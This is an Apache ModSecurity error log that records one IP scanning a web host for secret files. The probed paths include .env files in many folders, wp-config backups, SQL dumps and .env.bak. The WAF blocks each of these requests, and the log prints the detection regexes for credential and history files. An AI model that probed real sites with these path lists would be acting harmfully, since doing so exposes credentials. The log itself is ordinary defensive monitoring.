[Tue May 26 14:49:47.580787 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuJQAArh8"]
[Tue May 26 14:49:47.584969 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuIAAAri8"]
[Tue May 26 14:49:47.586029 2026] [security2:error] [pid 648203:tid 648442] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuKAAAAPI"]
[Tue May 26 14:49:47.590723 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuJAAAALs"]
[Tue May 26 14:49:47.592533 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuHwAArho"]
[Tue May 26 14:49:47.592970 2026] [security2:error] [pid 648203:tid 648222] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/web/.env"] [unique_id "ahVls7EQDDtxJNiDrdTuOgAArhI"]
[Tue May 26 14:49:48.205418 2026] [security2:error] [pid 648203:tid 648392] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuSAAAAMA"]
[Tue May 26 14:49:48.280873 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuLQAArgo"]
[Tue May 26 14:49:48.283637 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuLwAAALc"]
[Tue May 26 14:49:48.295748 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuMQAAALQ"]
[Tue May 26 14:49:48.299447 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuMwAAAKE"]
[Tue May 26 14:49:48.336988 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuRQAArjo"]
[Tue May 26 14:49:48.338194 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuRAAArjI"]
[Tue May 26 14:49:48.345081 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuVgAAAMI"]
[Tue May 26 14:49:48.347474 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuWQAAAOQ"]
[Tue May 26 14:49:48.349780 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuQgAArj0"]
[Tue May 26 14:49:48.350577 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuXQAAAPo"]
[Tue May 26 14:49:48.351434 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuQwAArjU"]
[Tue May 26 14:49:48.354404 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuWgAAAM8"]
[Tue May 26 14:49:48.359781 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuUgAArig"]
[Tue May 26 14:49:48.374606 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuSQAArgI"]
[Tue May 26 14:49:48.380852 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuSgAArn8"]
[Tue May 26 14:49:48.381164 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuXAAAAJ8"]
[Tue May 26 14:49:48.429428 2026] [security2:error] [pid 648203:tid 648245] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/website/.env"] [unique_id "ahVltLEQDDtxJNiDrdTucgAAnik"]
[Tue May 26 14:49:48.442468 2026] [security2:error] [pid 648203:tid 648455] [client 104.207.50.40:34397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVls7EQDDtxJNiDrdTuDgAAAP8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:48.444843 2026] [security2:error] [pid 648203:tid 648321] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php"] [unique_id "ahVltLEQDDtxJNiDrdTueAAAuXU"]
[Tue May 26 14:49:48.447661 2026] [security2:error] [pid 648203:tid 648227] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.bak"] [unique_id "ahVltLEQDDtxJNiDrdTueQAAuRc"]
[Tue May 26 14:49:48.483966 2026] [security2:error] [pid 648203:tid 648271] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.new"] [unique_id "ahVltLEQDDtxJNiDrdTuewAAuUM"]
[Tue May 26 14:49:48.485118 2026] [security2:error] [pid 648203:tid 648286] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.old"] [unique_id "ahVltLEQDDtxJNiDrdTufAAAuVI"]
[Tue May 26 14:49:48.496902 2026] [security2:error] [pid 648203:tid 648221] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVltLEQDDtxJNiDrdTufgAAuRE"]
[Tue May 26 14:49:48.502049 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTudgAAALs"]
[Tue May 26 14:49:48.546275 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTufwAAuTY"]
[Tue May 26 14:49:48.552995 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTugAAAuRU"]
[Tue May 26 14:49:48.565563 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTufQAAuSw"]
[Tue May 26 14:49:48.575434 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTugwAAAP0"]
[Tue May 26 14:49:48.846554 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTujgAAAKQ"]
[Tue May 26 14:49:48.866528 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:54224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTujwAAAPM"]
[Tue May 26 14:49:48.897401 2026] [security2:error] [pid 648203:tid 648344] [client 45.148.10.95:54276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahVltLEQDDtxJNiDrdTunAAAAJA"]
[Tue May 26 14:49:48.912579 2026] [security2:error] [pid 648203:tid 648370] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTukgAAAKo"]
[Tue May 26 14:49:48.937423 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTulQAAAQQ"]
[Tue May 26 14:49:48.944015 2026] [security2:error] [pid 648203:tid 648335] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTumAAAAIc"]
[Tue May 26 14:49:48.977850 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTunwAAAMU"]
[Tue May 26 14:49:49.015413 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:54224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.leakyleaks.moes-art.com"] [uri "/*update.cgi*"] [unique_id "ahVltbEQDDtxJNiDrdTuqwAAANI"]
[Tue May 26 14:49:49.051294 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:54276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.docker/.env"] [unique_id "ahVltbEQDDtxJNiDrdTurwAAAN8"]
[Tue May 26 14:49:49.086361 2026] [security2:error] [pid 648203:tid 648389] [client 45.148.10.95:54244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVltbEQDDtxJNiDrdTuswAAAL0"]
[Tue May 26 14:49:49.089775 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTurgAAAK0"]
[Tue May 26 14:49:49.094179 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:54316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend/.env"] [unique_id "ahVltbEQDDtxJNiDrdTutgAAAPw"]
[Tue May 26 14:49:49.152275 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:54202] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTutQAAAOQ"]
[Tue May 26 14:49:49.203562 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuuwAAAM8"]
[Tue May 26 14:49:49.210849 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuvgAAAPA"]
[Tue May 26 14:49:49.235448 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:54244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.backup"] [unique_id "ahVltbEQDDtxJNiDrdTuwAAAAKg"]
[Tue May 26 14:49:49.239697 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:54224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.bak"] [unique_id "ahVltbEQDDtxJNiDrdTuwwAAAOo"]
[Tue May 26 14:49:49.296464 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuwgAAAJI"]
[Tue May 26 14:49:49.322731 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuxgAAAJ4"]
[Tue May 26 14:49:49.331880 2026] [security2:error] [pid 648203:tid 648455] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuyQAAAP8"]
[Tue May 26 14:49:49.339336 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuzAAAALs"]
[Tue May 26 14:49:49.366413 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuzwAAAP0"]
[Tue May 26 14:49:49.372268 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu0gAAAJg"]
[Tue May 26 14:49:49.401348 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:54304] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu0wAAAKU"]
[Tue May 26 14:49:49.432315 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:54276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahVltbEQDDtxJNiDrdTu1wAAAPE"]
[Tue May 26 14:49:49.454457 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu1gAAAI8"]
[Tue May 26 14:49:49.516853 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu3gAAAJc"]
